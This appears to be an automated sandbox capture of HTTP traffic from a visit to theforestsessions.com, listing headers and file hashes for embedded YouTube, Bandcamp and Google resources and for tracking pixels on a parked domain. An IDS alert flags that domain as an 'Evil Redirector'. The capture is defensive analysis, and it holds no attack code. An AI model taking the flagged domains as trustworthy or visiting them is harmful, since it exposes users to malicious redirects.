Vary: Accept-Encoding


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   9529
Md5:    cda04fe2a2ffbb1923ea1ae5eca7264e
Sha1:   f005f7e64968a5d6e54463cadc959d1d2fd093e1
Sha256: dd9e5c29f0c2c1743ff9908cf1c650329d7816c1bb4dd7d437569bdd81fc369f
                                        
                                            GET /yts/cssbin/www-player-vfl9xqmUY.css HTTP/1.1 
Host: www.youtube.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.youtube.com/embed/6H2EOmf_vJQ
Cookie: VISITOR_INFO1_LIVE=VDBjT-m9Syc; YSC=hEExb76W9tA; PREF=f1=50000000; GPS=1

                                         
                                         172.217.20.46
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding, Origin
Content-Encoding: gzip
Timing-Allow-Origin: https://www.youtube.com
Content-Length: 53591
Date: Wed, 05 Jun 2019 15:52:29 GMT
Expires: Thu, 04 Jun 2020 15:52:29 GMT
Last-Modified: Tue, 04 Jun 2019 22:08:34 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Cache-Control: public, max-age=31536000
Age: 427509
Alt-Svc: quic=":443"; ma=2592000; v="46,44,43,39"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   53591
Md5:    afce3aef197fe3bbdf78549936991d28
Sha1:   cf888394a4379634b4617ab9a93f9c621deca2d6
Sha256: f65f93b2b3c2fb030a2d52dbe341c90438f928023da0f2e45e65eff5847943e9
                                        
                                            GET /px.gif?ch=2&rn=3.5120403258395942 HTTP/1.1 
Host: ww25.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
                                         199.59.242.151
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Content-Length: 42
Last-Modified: Sun, 02 Jun 2019 23:47:07 GMT
Connection: keep-alive
Etag: "5cf45ffb-2a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
                                            GET /px.gif?ch=1&rn=3.5120403258395942 HTTP/1.1 
Host: ww25.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
                                         199.59.242.151
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Content-Length: 42
Last-Modified: Sun, 02 Jun 2019 23:47:07 GMT
Connection: keep-alive
Etag: "5cf45ffb-2a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
                                            GET /snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com HTTP/1.1 
Host: ww25.kfc.i.illuminationes.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://theforestsessions.com/redooen/about/

                                         
                                         199.59.242.151
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IG7SHObzICYKHaBOUbC+jMeLDLR5s90PipG69dksYAn5Atc2WeM+jN0TYh0+vf0jbtmiBTCYdx5AeZ3RhVWVZA==


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   4028
Md5:    5e316cdcbcefc5a280fd83d5a776ba43
Sha1:   f58eb484a49cff055b373d68e3dc31b7581706ff
Sha256: d7f917314f16158af6778951585c28fae5412ddab6c306becfc049222af35615

Alerts:
  IDS:
    - ET CURRENT_EVENTS Evil Redirector Sep 29 2015
                                        
                                            GET /yts/jsbin/www-embed-player-vflHkE08a/www-embed-player.js HTTP/1.1 
Host: www.youtube.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.youtube.com/embed/6H2EOmf_vJQ
Cookie: VISITOR_INFO1_LIVE=VDBjT-m9Syc; YSC=hEExb76W9tA; PREF=f1=50000000; GPS=1

                                         
172.217.20.46
HTTP/1.1 200 OK
Content-Type: text/javascript
Accept-Ranges: bytes
Vary: Accept-Encoding, Origin
Content-Encoding: gzip
Timing-Allow-Origin: https://www.youtube.com
Content-Length: 38650
Date: Thu, 06 Jun 2019 22:40:18 GMT
Expires: Fri, 14 Jun 2019 22:40:18 GMT
Last-Modified: Thu, 06 Jun 2019 05:59:29 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Cache-Control: public, max-age=691200
Age: 316640
Alt-Svc: quic=":443"; ma=2592000; v="46,44,43,39"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   38650
Md5:    f8afcd8920b079e50ab16f75c6a47837
Sha1:   5b440079f128fa91a8fe4de3efae23703593ba20
Sha256: 43b95f51a07aaf74979441a285bee7774f022b4b6ea09fe80c6944bd3b1bc1ed
                                        
GET /px.gif?ch=1&rn=4.590763023574391 HTTP/1.1
Host: ww25.kfc.i.illuminationes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
199.59.242.151
HTTP/1.1 200 OK
Content-Type: image/gif
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Content-Length: 42
Last-Modified: Sun, 02 Jun 2019 23:47:07 GMT
Connection: keep-alive
Etag: "5cf45ffb-2a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
GET /px.gif?ch=1&rn=8.847065328139752 HTTP/1.1
Host: ww25.kfc.i.illuminationes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
199.59.242.151
HTTP/1.1 200 OK
Content-Type: image/gif
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Content-Length: 42
Last-Modified: Sun, 02 Jun 2019 23:47:13 GMT
Connection: keep-alive
Etag: "5cf46001-2a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
GET /px.gif?ch=2&rn=8.847065328139752 HTTP/1.1
Host: ww25.kfc.i.illuminationes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
199.59.242.151
HTTP/1.1 200 OK
Content-Type: image/gif
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Content-Length: 42
Last-Modified: Sun, 02 Jun 2019 23:47:00 GMT
Connection: keep-alive
Etag: "5cf45ff4-2a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
GET /px.gif?ch=2&rn=4.590763023574391 HTTP/1.1
Host: ww25.kfc.i.illuminationes.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ww25.kfc.i.illuminationes.com/snitch?default_keyword=About%20%7C%20REDOO&referrer=&se_referrer=&source=theforestsessions.com

                                         
199.59.242.151
HTTP/1.1 200 OK
Content-Type: image/gif
Server: openresty
Date: Mon, 10 Jun 2019 14:37:38 GMT
Content-Length: 42
Last-Modified: Sun, 02 Jun 2019 23:47:07 GMT
Connection: keep-alive
Etag: "5cf45ffb-2a"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
GET /yts/jsbin/player_ias-vfl25EWhw/en_US/base.js HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.youtube.com/embed/6H2EOmf_vJQ
Cookie: VISITOR_INFO1_LIVE=VDBjT-m9Syc; YSC=hEExb76W9tA; PREF=f1=50000000; GPS=1

                                         
172.217.20.46
HTTP/1.1 200 OK
Content-Type: text/javascript
Accept-Ranges: bytes
Vary: Accept-Encoding, Origin
Content-Encoding: gzip
Timing-Allow-Origin: https://www.youtube.com
Content-Length: 384251
Date: Thu, 06 Jun 2019 22:42:57 GMT
Expires: Fri, 14 Jun 2019 22:42:57 GMT
Last-Modified: Thu, 06 Jun 2019 04:05:08 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Cache-Control: public, max-age=691200
Age: 316481
Alt-Svc: quic=":443"; ma=2592000; v="46,44,43,39"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   384251
Md5:    1aaacba46a3fc3285bd2715cb85a0d8b
Sha1:   a45371687ed4a89363e05cfce83505948c580a5f
Sha256: 4460f0f31d1f17fd47f02892083531b09014501bb6042f837213796401f6a562
                                        
GET /s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.youtube.com/embed/6H2EOmf_vJQ
Origin: https://www.youtube.com

                                         
172.217.22.163
HTTP/1.1 200 OK
Content-Type: font/woff
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Content-Length: 19824
Date: Mon, 03 Jun 2019 09:53:01 GMT
Expires: Tue, 02 Jun 2020 09:53:01 GMT
Last-Modified: Mon, 16 Oct 2017 17:32:56 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Cache-Control: public, max-age=31536000
Age: 621880
Alt-Svc: quic=":443"; ma=2592000; v="46,44,43,39"


--- Additional Info ---
Magic:  data
Size:   19824
Md5:    bafb105baeb22d965c70fe52ba6b49d9
Sha1:   934014cc9bbe5883542be756b3146c05844b254f
Sha256: 1570f866bf6eae82041e407280894a86ad2b8b275e01908ae156914dc693a4ed
                                        
POST /GTSGIAG3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
216.58.207.227
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Mon, 10 Jun 2019 14:37:41 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   471
Md5:    f1fea07f548d4ff0bf2a0f4aa32b2d58
Sha1:   03fb37cb2ce610e96b53227583083ed7eab5bc60
Sha256: 08276f601d6500298e9d29f101446e27767c0652cc4cf070eca8660b2fe4403d
                                        
GET /ga.js HTTP/1.1
Host: ssl.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://bandcamp.com/EmbeddedPlayer.html/ref=http%253A%252F%252Ftheforestsessions.com%252Fredooen%252Fabout%252F/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/

                                         
216.58.207.232
HTTP/1.1 200 OK
Content-Type: text/javascript
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
Timing-Allow-Origin: *
Date: Mon, 10 Jun 2019 13:14:31 GMT
Expires: Mon, 10 Jun 2019 15:14:31 GMT
Last-Modified: Tue, 21 May 2019 23:53:44 GMT
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 17168
Cache-Control: public, max-age=7200
Age: 4990
Alt-Svc: quic=":443"; ma=2592000; v="46,44,43,39"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   17168
Md5:    01d5892e6e243b52998310c2925b9f3a
Sha1:   58180151b6a6ee4af73583a214b68efb9e8844d4
Sha256: 7e90efb4620a78e8869796d256bcddbde90b853c8c15c5cc116cb11d3d17bc4d
                                        
GET /favicon.ico HTTP/1.1
Host: theforestsessions.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: 60gpBAK=R1224190331; 60gp=R2337348221; PHPSESSID=fcf404e00c4c88ba233c8611e7468caf

                                         
213.186.33.19
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: 60gp=R2337348221; path=/; expires=Mon, 10-Jun-2019 15:56:33 GMT
Date: Mon, 10 Jun 2019 14:37:41 GMT
Server: Apache
Content-Length: 209
X-IPLB-Instance: 17321


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   209
Md5:    18ffb59b61525f781cf9251045be575d
Sha1:   bd7318b00b15b7a1c8a48524419fa2e5c27a5b6d
Sha256: b6682cab65d3243b5b75efb7279dbf49491957484780f2ba0a87632cc0e25642
                                        
GET /favicon.ico HTTP/1.1
Host: theforestsessions.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: 60gpBAK=R1224190331; 60gp=R2337348221; PHPSESSID=fcf404e00c4c88ba233c8611e7468caf

                                         
213.186.33.19
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: 60gp=R2337348221; path=/; expires=Mon, 10-Jun-2019 15:37:12 GMT
Date: Mon, 10 Jun 2019 14:37:44 GMT
Server: Apache
Content-Length: 209
X-IPLB-Instance: 504


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   209
Md5:    18ffb59b61525f781cf9251045be575d
Sha1:   bd7318b00b15b7a1c8a48524419fa2e5c27a5b6d
Sha256: b6682cab65d3243b5b75efb7279dbf49491957484780f2ba0a87632cc0e25642
                                        
GET /tmpdata/cache/jquery_ui_bundle_min_88620fcd733dfe9ed2d4a470d2f5c28e.js HTTP/1.1
Host: s4.bcbits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://bandcamp.com/EmbeddedPlayer.html/ref=http%253A%252F%252Ftheforestsessions.com%252Fredooen%252Fabout%252F/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/

                                         
0.0.0.0


--- Additional Info ---
                                        
GET /tmpdata/cache/embedded_player_bundle_6cf581cfb4d19abcf44c978e1a3376eb.css HTTP/1.1
Host: s4.bcbits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://bandcamp.com/EmbeddedPlayer.html/ref=http%253A%252F%252Ftheforestsessions.com%252Fredooen%252Fabout%252F/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/

                                         
0.0.0.0


--- Additional Info ---
                                        
GET /tmpdata/cache/embedded_player_v3_bundle_da87b1c1138b7d55cc513d7683863c13.css HTTP/1.1
Host: s4.bcbits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://bandcamp.com/EmbeddedPlayer.html/ref=http%253A%252F%252Ftheforestsessions.com%252Fredooen%252Fabout%252F/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/

                                         
0.0.0.0


--- Additional Info ---
                                        
GET /tmpdata/cache/v3_large_40b335e7d2273cdbbe2b231285051594.css HTTP/1.1
Host: s4.bcbits.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://bandcamp.com/EmbeddedPlayer.html/ref=http%253A%252F%252Ftheforestsessions.com%252Fredooen%252Fabout%252F/album=2437981243/size=large/bgcol=333333/linkcol=ffffff/transparent=true/

                                         
0.0.0.0


--- Additional Info ---